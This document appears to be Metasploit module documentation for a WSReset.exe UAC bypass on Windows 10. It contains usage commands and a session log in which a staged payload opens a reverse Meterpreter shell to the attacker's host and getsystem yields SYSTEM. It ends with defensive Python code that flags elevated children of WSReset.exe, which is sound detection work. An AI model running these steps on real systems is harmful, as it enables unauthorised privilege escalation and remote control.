## Introduction

This module exploits a flaw in WSReset.exe, the Windows Store Reset Tool. The
binary is marked with the `autoElevate` property set to true, and when launched
it automatically runs a file whose path it reads from a registry location that a
low-privileged user can write to, with elevated privileges. To bypass UAC, the
module places a binary on disk, writes its location into the relevant registry
key, and runs WSReset.exe; the binary is then executed with elevated privileges.

## Usage

1. Create a session on the target system under the context of a local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_windows_store_reg`.
1. Set the `PAYLOAD` and configure it correctly.
1. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.

## Scenarios

### Windows 10.0.17134.885 x64

```
msf5 exploit(windows/local/bypassuac_windows_store_reg) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\WSReset.exe
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Making Registry Changes
[*] Registry Changes Complete
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\WSReset.exe
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe!
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 4 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2019-09-04 17:01:46 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-3DKRD1E
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-3DKRD1E\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
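The chain visible in the output above (an elevated `WSReset.exe` spawning `cmd.exe /c start` on a payload under `%TEMP%`) is what a defender would hunt for. The following is an added example, not part of this module or the Metasploit project: it walks constructed process-creation records shaped like Sysmon Event ID 1 fields and flags elevated descendants of WSReset.exe that reference a user-writable path. The event shape, PIDs and paths are assumptions built from the session log above.

```python
import re

# Constructed sample events (not from a real host), shaped like Sysmon
# Event ID 1 records, reproducing the chain shown in the module output.
SAMPLE_EVENTS = [
    {"ProcessId": 4000, "ParentProcessId": 1200, "IntegrityLevel": "High",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WSReset.exe",
     "CommandLine": r"C:\Windows\System32\WSReset.exe"},
    {"ProcessId": 4100, "ParentProcessId": 4000, "IntegrityLevel": "High",
     "ParentImage": r"C:\Windows\System32\WSReset.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c start "
                    r"C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe"},
    {"ProcessId": 4200, "ParentProcessId": 4100, "IntegrityLevel": "High",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe",
     "CommandLine": r"C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe"},
    {"ProcessId": 4300, "ParentProcessId": 800, "IntegrityLevel": "Medium",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# A standard user can write here; an elevated process referencing such a
# path from under WSReset.exe is the signature of this bypass.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)


def find_wsreset_abuse(events):
    """Return every High-integrity descendant of WSReset.exe whose image
    or command line points into a user-writable directory.

    Events must be in chronological order so parents are seen first.
    """
    tainted = set()   # PIDs of WSReset.exe and everything it spawned
    hits = []
    for ev in events:
        if ev["Image"].lower().endswith(r"\wsreset.exe"):
            tainted.add(ev["ProcessId"])       # lineage root
            continue
        if ev["ParentProcessId"] not in tainted:
            continue
        tainted.add(ev["ProcessId"])           # grandchildren count too
        if ev["IntegrityLevel"] == "High" and (
            USER_WRITABLE.search(ev["Image"])
            or USER_WRITABLE.search(ev["CommandLine"])
        ):
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in find_wsreset_abuse(SAMPLE_EVENTS):
        print(f"suspicious elevated child pid={ev['ProcessId']}: {ev['CommandLine']}")
```

On a real host, PID reuse across a long log window can poison the lineage set, so scope the scan to a short time window or key on process GUIDs where the sensor provides them.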
